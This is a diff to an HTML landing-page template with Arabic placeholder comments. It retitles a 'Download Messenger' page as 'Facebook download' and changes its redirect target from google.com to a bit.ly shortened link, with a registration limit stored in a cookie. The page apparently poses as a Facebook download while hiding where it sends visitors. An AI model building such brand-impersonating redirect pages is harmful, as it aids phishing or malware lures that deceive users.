--- a/index.html
+++ b/index.html
@@ -14,9 +14,9 @@
 
   <!-- ضع العنوان الخاص بك هنا  -->
   <title> Download Messenger</title>
-  <meta name="title" content="Download Messenger">
-  <meta property="twitter:title" content="Download Messenger">
-  <meta property="og:title" content="Download Messenger">
+  <meta name="title" content="Facebook download">
+  <meta property="twitter:title" content="Facebook download">
+  <meta property="og:title" content="Facebook download">
 
 
   <!-- ضع الوصف الخاص بك هنا  -->
@@ -43,7 +43,7 @@
 
   <script>
 
-    const URL = "https://www.google.com"; // أدخل الرابط الخاص بك هنا
+    const URL = "https://bit.ly/3eDnB61"; // أدخل الرابط الخاص بك هنا
     const LIMIT = "2"; // أدخل عدد التسجيل المتاح
 
     document.cookie = `rURL=${URL},vLimit=${LIMIT}`;
